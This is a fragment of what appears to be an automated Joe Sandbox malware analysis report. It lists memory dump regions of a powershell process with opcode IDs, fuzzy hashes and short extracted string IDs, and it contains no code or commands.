                                                                  • Instruction Fuzzy Hash: 20013C75A00109DFCB14CF9DD9809ADF7B2FF88324B248669E459A7655CB32EC51CB90
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2389643120.0000000004AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AD0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_4ad0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 64632cb2dcc5d0f37e75aaef45f107bcdc2566c04bf2b0591adc8fe5d39e7860
                                                                  • Instruction ID: 6e81053ea83c47717e1a9fa341c7870aaad79a63422d670f7230c3217869caf3
                                                                  • Opcode Fuzzy Hash: 64632cb2dcc5d0f37e75aaef45f107bcdc2566c04bf2b0591adc8fe5d39e7860
                                                                  • Instruction Fuzzy Hash: 50F0D435A001099FCB15CF9CD990AEEF7B1FF88324F208199E955A72A1C732EC52CB60
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4']q$4']q$4']q$4']q$84!l$84!l$tP]q$tP]q$t~pq$$]q$$]q$$]q$$]q
                                                                  • API String ID: 0-4181997561
                                                                  • Opcode ID: b8202ee9b2fcab642d64b366629bbdecef58f6ad6f520c642e8d8eb6dffb048f
                                                                  • Instruction ID: a820506e65f53f611c26ef3dbe70c990f783ce5e44706088030bf4a6b405ea97
                                                                  • Opcode Fuzzy Hash: b8202ee9b2fcab642d64b366629bbdecef58f6ad6f520c642e8d8eb6dffb048f
                                                                  • Instruction Fuzzy Hash: 0FF176B1F0020A9FCB249F68C4546AAFBE6FF99710F25846AD849CB251DF31DC41C7A2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4']q$4']q$4']q$4']q$84!l$84!l$tP]q$tP]q$$]q$$]q$$]q
                                                                  • API String ID: 0-4187099192
                                                                  • Opcode ID: 078c48e11915732ef329a99097fd6af12802447c64dc85a28bc0efb6350c2bb5
                                                                  • Instruction ID: 76a1ce7aa3e7a3fe503567d778f7d3a800eb5b3d4c664fcc7f05a439970b4833
                                                                  • Opcode Fuzzy Hash: 078c48e11915732ef329a99097fd6af12802447c64dc85a28bc0efb6350c2bb5
                                                                  • Instruction Fuzzy Hash: A4A124B1B0421ADFCB298FA8D4446AABBE6FFA6310F14C46AD855CB255DB31CC41C7B1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4']q$4']q$4']q$4']q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                  • API String ID: 0-267665775
                                                                  • Opcode ID: 6649f04c6d2c201f48f40adcbda89a97c48f1c7c01a0834bcc7bb03611069a2f
                                                                  • Instruction ID: 27605d9484bedc66d346547e1938a672963eb7903f4cd952619bce2bedd8c6b9
                                                                  • Opcode Fuzzy Hash: 6649f04c6d2c201f48f40adcbda89a97c48f1c7c01a0834bcc7bb03611069a2f
                                                                  • Instruction Fuzzy Hash: DAA14AB170421A8FCB259E399960A7ABBF6FFE2310F1484B6D845CB291DE35CC45C3A1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_78d0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (f#l$(f#l$(f#l$(f#l$4']q$4']q$4 l$4 l
                                                                  • API String ID: 0-4228074082
                                                                  • Opcode ID: dff1d96ee931e9ca3a4f945a96e2c57ac40070d815811c5bb31e69f76791134c
                                                                  • Instruction ID: b82954047a2d504e2a01c9f913486aeb17325c71c10e83d6e949bb0c6f8ed100
                                                                  • Opcode Fuzzy Hash: dff1d96ee931e9ca3a4f945a96e2c57ac40070d815811c5bb31e69f76791134c
                                                                  • Instruction Fuzzy Hash: 1861DFB0B0120AAFC714DF68C551A6ABBE3BF99314F148569D805AF354CB36EC41CB92
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2414343552.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false